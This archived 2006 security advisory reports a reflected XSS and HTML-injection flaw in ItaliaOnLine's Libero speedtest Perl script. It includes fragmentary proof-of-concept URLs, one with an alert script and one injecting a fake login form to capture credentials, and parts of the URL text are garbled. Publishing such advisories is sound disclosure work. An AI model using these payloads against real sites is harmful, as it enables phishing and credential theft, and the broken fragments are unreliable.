Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Web :: Specific Sites :: b06-2014.htm XSS vulnerability - HTML injection XSS vulnerability - HTML injection XSS vulnerability - HTML injection

--Security Report--
Advisory: XSS vulnerability - HTML injection
Author: Davide Denicolo
Date: 28/04/06 
Vendor: ItaliaOnLine S.r.l ( 
Service: Web
Level: Low
Description: is a Web portal of big Italian ISP: ItaliaOnLine offering
dial-up,Broadband and talk services.
A Broadband service  called "Libero speedtest" is a simple "Bandwidth Speed
A java applet test, send Bandwidth information to perl script
( in the GET request and
this perl script simply put parameter in the page as HTML;
an attacker can exploit the vulnerable script to have arbitrary script code
executed in the browser or injects html form so redirect a login
authentication to another web application;

this is a normal HTTP URL: 
3&tdown=18875&tup=74297&size 48.0&t=0

this is a XSS URL: 
ipt>alert('ciao')&tdown=3455&tup=5107&size 48.0&t=0

and this is an HTML form :


src="" alt="Entra" border="0" height="22" type="image" width="44">

and this is previous form injects in the request: le%20border="0"%20width="32%"> .1">">ize:8pt">">< /option>name="T3"%20style="font-size:7pt">


< /tr>&tdown=3455&tup=5107&size 48.0&t=0 -- Timeline: * 2/05/2006: Vulnerability found. * 2/05/2006: Unable to contact vendor -- For more information, please send question to:

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH